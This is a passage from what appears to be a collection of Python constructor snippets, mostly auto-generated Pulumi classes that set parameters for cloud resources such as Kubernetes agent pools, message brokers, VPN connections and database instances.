pulumi.set(__self__, \"port\", port)\n if weight is not None:\n pulumi.set(__self__, \"weight\", weight)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n kms_key: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n schedule_config: Optional[pulumi.Input[pulumi.InputType['DataIntegrationScheduleConfigArgs']]] = None,\n source_uri: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n app_name: pulumi.Input[str],\n product_id: pulumi.Input[str],\n type: pulumi.Input[str],\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"app_name\", app_name)\n pulumi.set(__self__, \"product_id\", product_id)\n pulumi.set(__self__, \"type\", type)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if encoded_icon is not None:\n pulumi.set(__self__, \"encoded_icon\", encoded_icon)\n if industry_id is not None:\n pulumi.set(__self__, \"industry_id\", industry_id)\n if package_name is not None:\n pulumi.set(__self__, \"package_name\", package_name)", "def __init__(__self__, *,\n algorithm: str,\n attestation: 'outputs.KeyOperationAttestationResponse',\n create_time: str,\n destroy_event_time: str,\n destroy_time: str,\n external_protection_level_options: 'outputs.ExternalProtectionLevelOptionsResponse',\n generate_time: str,\n import_failure_reason: str,\n import_job: str,\n import_time: str,\n name: str,\n protection_level: str,\n reimport_eligible: bool,\n state: str):\n pulumi.set(__self__, \"algorithm\", algorithm)\n pulumi.set(__self__, \"attestation\", attestation)\n pulumi.set(__self__, \"create_time\", create_time)\n pulumi.set(__self__, \"destroy_event_time\", destroy_event_time)\n pulumi.set(__self__, \"destroy_time\", destroy_time)\n pulumi.set(__self__, \"external_protection_level_options\", external_protection_level_options)\n pulumi.set(__self__, \"generate_time\", generate_time)\n pulumi.set(__self__, \"import_failure_reason\", import_failure_reason)\n pulumi.set(__self__, \"import_job\", import_job)\n pulumi.set(__self__, \"import_time\", import_time)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"protection_level\", protection_level)\n pulumi.set(__self__, \"reimport_eligible\", reimport_eligible)\n pulumi.set(__self__, \"state\", state)", "def __init__(__self__, *,\n instance: pulumi.Input[str],\n charset: Optional[pulumi.Input[str]] = None,\n collation: Optional[pulumi.Input[str]] = None,\n deletion_policy: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"instance\", instance)\n if charset is not None:\n pulumi.set(__self__, \"charset\", charset)\n if collation is not None:\n pulumi.set(__self__, \"collation\", collation)\n if deletion_policy is not None:\n pulumi.set(__self__, \"deletion_policy\", deletion_policy)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(self, attributes=None, aux_input_type1=None, aux_input_type10=None, aux_input_type2=None, aux_input_type3=None, aux_input_type4=None, aux_input_type5=None, aux_input_type6=None, aux_input_type7=None, aux_input_type8=None, aux_input_type9=None, engine_hours=None, external_ids=None, gateway_serial=None, harsh_acceleration_setting_type=None, license_plate=None, name=None, notes=None, odometer_meters=None, static_assigned_driver_id=None, tag_ids=None, vin=None, local_vars_configuration=None): # noqa: E501 # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._attributes = None\n self._aux_input_type1 = None\n self._aux_input_type10 = None\n self._aux_input_type2 = None\n self._aux_input_type3 = None\n self._aux_input_type4 = None\n self._aux_input_type5 = None\n self._aux_input_type6 = None\n self._aux_input_type7 = None\n self._aux_input_type8 = None\n self._aux_input_type9 = None\n self._engine_hours = None\n self._external_ids = None\n self._gateway_serial = None\n self._harsh_acceleration_setting_type = None\n self._license_plate = None\n self._name = None\n self._notes = None\n self._odometer_meters = None\n self._static_assigned_driver_id = None\n self._tag_ids = None\n self._vin = None\n self.discriminator = None\n\n if attributes is not None:\n self.attributes = attributes\n if aux_input_type1 is not None:\n self.aux_input_type1 = aux_input_type1\n if aux_input_type10 is not None:\n self.aux_input_type10 = aux_input_type10\n if aux_input_type2 is not None:\n self.aux_input_type2 = aux_input_type2\n if aux_input_type3 is not None:\n self.aux_input_type3 = aux_input_type3\n if aux_input_type4 is not None:\n self.aux_input_type4 = aux_input_type4\n if aux_input_type5 is not None:\n self.aux_input_type5 = aux_input_type5\n if aux_input_type6 is not None:\n self.aux_input_type6 = aux_input_type6\n if aux_input_type7 is not None:\n self.aux_input_type7 = aux_input_type7\n if aux_input_type8 is not None:\n self.aux_input_type8 = aux_input_type8\n if aux_input_type9 is not None:\n self.aux_input_type9 = aux_input_type9\n if engine_hours is not None:\n self.engine_hours = engine_hours\n if external_ids is not None:\n self.external_ids = external_ids\n if gateway_serial is not None:\n self.gateway_serial = gateway_serial\n if harsh_acceleration_setting_type is not None:\n self.harsh_acceleration_setting_type = harsh_acceleration_setting_type\n if license_plate is not None:\n self.license_plate = license_plate\n if name is not None:\n self.name = name\n if notes is not None:\n self.notes = notes\n if odometer_meters is not None:\n self.odometer_meters = odometer_meters\n if static_assigned_driver_id is not None:\n self.static_assigned_driver_id = static_assigned_driver_id\n if tag_ids is not None:\n self.tag_ids = tag_ids\n if vin is not None:\n self.vin = vin", "def __init__(__self__, *,\n name: pulumi.Input[str],\n args: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"name\", name)\n if args is not None:\n pulumi.set(__self__, \"args\", args)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None,\n zone_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n app_name: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None,\n product_id: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: pulumi.Input[str],\n availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n capacity_reservation_group_id: Optional[pulumi.Input[str]] = None,\n count: Optional[pulumi.Input[int]] = None,\n creation_data: Optional[pulumi.Input['CreationDataArgs']] = None,\n enable_auto_scaling: Optional[pulumi.Input[bool]] = None,\n enable_custom_ca_trust: Optional[pulumi.Input[bool]] = None,\n enable_encryption_at_host: Optional[pulumi.Input[bool]] = None,\n enable_fips: Optional[pulumi.Input[bool]] = None,\n enable_node_public_ip: Optional[pulumi.Input[bool]] = None,\n enable_ultra_ssd: Optional[pulumi.Input[bool]] = None,\n gpu_instance_profile: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]] = None,\n host_group_id: Optional[pulumi.Input[str]] = None,\n kubelet_config: Optional[pulumi.Input['KubeletConfigArgs']] = None,\n kubelet_disk_type: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]] = None,\n linux_os_config: Optional[pulumi.Input['LinuxOSConfigArgs']] = None,\n max_count: Optional[pulumi.Input[int]] = None,\n max_pods: Optional[pulumi.Input[int]] = None,\n message_of_the_day: Optional[pulumi.Input[str]] = None,\n min_count: Optional[pulumi.Input[int]] = None,\n mode: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]] = None,\n network_profile: Optional[pulumi.Input['AgentPoolNetworkProfileArgs']] = None,\n node_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n node_public_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n orchestrator_version: Optional[pulumi.Input[str]] = None,\n os_disk_size_gb: Optional[pulumi.Input[int]] = None,\n os_disk_type: Optional[pulumi.Input[Union[str, 'OSDiskType']]] = None,\n os_sku: Optional[pulumi.Input[Union[str, 'OSSKU']]] = None,\n os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,\n pod_subnet_id: Optional[pulumi.Input[str]] = None,\n power_state: Optional[pulumi.Input['PowerStateArgs']] = None,\n proximity_placement_group_id: Optional[pulumi.Input[str]] = None,\n scale_down_mode: Optional[pulumi.Input[Union[str, 'ScaleDownMode']]] = None,\n scale_set_eviction_policy: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]] = None,\n scale_set_priority: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]] = None,\n security_profile: Optional[pulumi.Input['AgentPoolSecurityProfileArgs']] = None,\n spot_max_price: Optional[pulumi.Input[float]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n type: Optional[pulumi.Input[Union[str, 'AgentPoolType']]] = None,\n upgrade_settings: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']] = None,\n vm_size: Optional[pulumi.Input[str]] = None,\n vnet_subnet_id: Optional[pulumi.Input[str]] = None,\n windows_profile: Optional[pulumi.Input['AgentPoolWindowsProfileArgs']] = None,\n workload_runtime: Optional[pulumi.Input[Union[str, 'WorkloadRuntime']]] = None):\n pulumi.set(__self__, \"name\", name)\n if availability_zones is not None:\n pulumi.set(__self__, \"availability_zones\", availability_zones)\n if capacity_reservation_group_id is not None:\n pulumi.set(__self__, \"capacity_reservation_group_id\", capacity_reservation_group_id)\n if count is not None:\n pulumi.set(__self__, \"count\", count)\n if creation_data is not None:\n pulumi.set(__self__, \"creation_data\", creation_data)\n if enable_auto_scaling is not None:\n pulumi.set(__self__, \"enable_auto_scaling\", enable_auto_scaling)\n if enable_custom_ca_trust is not None:\n pulumi.set(__self__, \"enable_custom_ca_trust\", enable_custom_ca_trust)\n if enable_encryption_at_host is not None:\n pulumi.set(__self__, \"enable_encryption_at_host\", enable_encryption_at_host)\n if enable_fips is not None:\n pulumi.set(__self__, \"enable_fips\", enable_fips)\n if enable_node_public_ip is not None:\n pulumi.set(__self__, \"enable_node_public_ip\", enable_node_public_ip)\n if enable_ultra_ssd is not None:\n pulumi.set(__self__, \"enable_ultra_ssd\", enable_ultra_ssd)\n if gpu_instance_profile is not None:\n pulumi.set(__self__, \"gpu_instance_profile\", gpu_instance_profile)\n if host_group_id is not None:\n pulumi.set(__self__, \"host_group_id\", host_group_id)\n if kubelet_config is not None:\n pulumi.set(__self__, \"kubelet_config\", kubelet_config)\n if kubelet_disk_type is not None:\n pulumi.set(__self__, \"kubelet_disk_type\", kubelet_disk_type)\n if linux_os_config is not None:\n pulumi.set(__self__, \"linux_os_config\", linux_os_config)\n if max_count is not None:\n pulumi.set(__self__, \"max_count\", max_count)\n if max_pods is not None:\n pulumi.set(__self__, \"max_pods\", max_pods)\n if message_of_the_day is not None:\n pulumi.set(__self__, \"message_of_the_day\", message_of_the_day)\n if min_count is not None:\n pulumi.set(__self__, \"min_count\", min_count)\n if mode is not None:\n pulumi.set(__self__, \"mode\", mode)\n if network_profile is not None:\n pulumi.set(__self__, \"network_profile\", network_profile)\n if node_labels is not None:\n pulumi.set(__self__, \"node_labels\", node_labels)\n if node_public_ip_prefix_id is not None:\n pulumi.set(__self__, \"node_public_ip_prefix_id\", node_public_ip_prefix_id)\n if node_taints is not None:\n pulumi.set(__self__, \"node_taints\", node_taints)\n if orchestrator_version is not None:\n pulumi.set(__self__, \"orchestrator_version\", orchestrator_version)\n if os_disk_size_gb is not None:\n pulumi.set(__self__, \"os_disk_size_gb\", os_disk_size_gb)\n if os_disk_type is not None:\n pulumi.set(__self__, \"os_disk_type\", os_disk_type)\n if os_sku is not None:\n pulumi.set(__self__, \"os_sku\", os_sku)\n if os_type is not None:\n pulumi.set(__self__, \"os_type\", os_type)\n if pod_subnet_id is not None:\n pulumi.set(__self__, \"pod_subnet_id\", pod_subnet_id)\n if power_state is not None:\n pulumi.set(__self__, \"power_state\", power_state)\n if proximity_placement_group_id is not None:\n pulumi.set(__self__, \"proximity_placement_group_id\", proximity_placement_group_id)\n if scale_down_mode is not None:\n pulumi.set(__self__, \"scale_down_mode\", scale_down_mode)\n if scale_set_eviction_policy is not None:\n pulumi.set(__self__, \"scale_set_eviction_policy\", scale_set_eviction_policy)\n if scale_set_priority is not None:\n pulumi.set(__self__, \"scale_set_priority\", scale_set_priority)\n if security_profile is not None:\n pulumi.set(__self__, \"security_profile\", security_profile)\n if spot_max_price is not None:\n pulumi.set(__self__, \"spot_max_price\", spot_max_price)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if upgrade_settings is not None:\n pulumi.set(__self__, \"upgrade_settings\", upgrade_settings)\n if vm_size is not None:\n pulumi.set(__self__, \"vm_size\", vm_size)\n if vnet_subnet_id is not None:\n pulumi.set(__self__, \"vnet_subnet_id\", vnet_subnet_id)\n if windows_profile is not None:\n pulumi.set(__self__, \"windows_profile\", windows_profile)\n if workload_runtime is not None:\n pulumi.set(__self__, \"workload_runtime\", workload_runtime)", "def __init__(__self__, *,\n instance_id: pulumi.Input[int]):\n pulumi.set(__self__, \"instance_id\", instance_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n config: Optional[pulumi.Input[pulumi.InputType['ConfigArgs']]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: pulumi.Input[str]):\n pulumi.set(__self__, \"name\", name)", "def __init__(self, name, fuel, reliability):\n super().__init__(name, fuel)\n self.reliability = reliability", "def __init__(self, chain_instance, *args, **kwargs):\n protocol_logger('Intializing protocol processor')\n self.chain_instance = chain_instance", "def __init__(__self__, *,\n apply_immediately: Optional[pulumi.Input[bool]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n authentication_strategy: Optional[pulumi.Input[str]] = None,\n auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,\n broker_name: Optional[pulumi.Input[str]] = None,\n configuration: Optional[pulumi.Input['BrokerConfigurationArgs']] = None,\n deployment_mode: Optional[pulumi.Input[str]] = None,\n encryption_options: Optional[pulumi.Input['BrokerEncryptionOptionsArgs']] = None,\n engine_type: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n host_instance_type: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input['BrokerInstanceArgs']]]] = None,\n ldap_server_metadata: Optional[pulumi.Input['BrokerLdapServerMetadataArgs']] = None,\n logs: Optional[pulumi.Input['BrokerLogsArgs']] = None,\n maintenance_window_start_time: Optional[pulumi.Input['BrokerMaintenanceWindowStartTimeArgs']] = None,\n publicly_accessible: Optional[pulumi.Input[bool]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n storage_type: Optional[pulumi.Input[str]] = None,\n subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n users: Optional[pulumi.Input[Sequence[pulumi.Input['BrokerUserArgs']]]] = None):\n if apply_immediately is not None:\n pulumi.set(__self__, \"apply_immediately\", apply_immediately)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if authentication_strategy is not None:\n pulumi.set(__self__, \"authentication_strategy\", authentication_strategy)\n if auto_minor_version_upgrade is not None:\n pulumi.set(__self__, \"auto_minor_version_upgrade\", auto_minor_version_upgrade)\n if broker_name is not None:\n pulumi.set(__self__, \"broker_name\", broker_name)\n if configuration is not None:\n pulumi.set(__self__, \"configuration\", configuration)\n if deployment_mode is not None:\n pulumi.set(__self__, \"deployment_mode\", deployment_mode)\n if encryption_options is not None:\n pulumi.set(__self__, \"encryption_options\", encryption_options)\n if engine_type is not None:\n pulumi.set(__self__, \"engine_type\", engine_type)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if host_instance_type is not None:\n pulumi.set(__self__, \"host_instance_type\", host_instance_type)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if ldap_server_metadata is not None:\n pulumi.set(__self__, \"ldap_server_metadata\", ldap_server_metadata)\n if logs is not None:\n pulumi.set(__self__, \"logs\", logs)\n if maintenance_window_start_time is not None:\n pulumi.set(__self__, \"maintenance_window_start_time\", maintenance_window_start_time)\n if publicly_accessible is not None:\n pulumi.set(__self__, \"publicly_accessible\", publicly_accessible)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if storage_type is not None:\n pulumi.set(__self__, \"storage_type\", storage_type)\n if subnet_ids is not None:\n pulumi.set(__self__, \"subnet_ids\", subnet_ids)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if users is not None:\n pulumi.set(__self__, \"users\", users)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n arp: Optional[pulumi.Input[bool]] = None,\n control_node_id: Optional[pulumi.Input[str]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n honeypot_bind_lists: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['HoneypotProbeHoneypotBindListArgs']]]]] = None,\n ping: Optional[pulumi.Input[bool]] = None,\n probe_type: Optional[pulumi.Input[str]] = None,\n probe_version: Optional[pulumi.Input[str]] = None,\n proxy_ip: Optional[pulumi.Input[str]] = None,\n service_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n uuid: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n key: pulumi.Input[bool],\n name: pulumi.Input[str],\n required: pulumi.Input[bool],\n secret: pulumi.Input[bool],\n description: Optional[pulumi.Input[str]] = None,\n queryable: Optional[pulumi.Input[bool]] = None,\n type: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"key\", key)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"required\", required)\n pulumi.set(__self__, \"secret\", secret)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if queryable is not None:\n pulumi.set(__self__, \"queryable\", queryable)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, 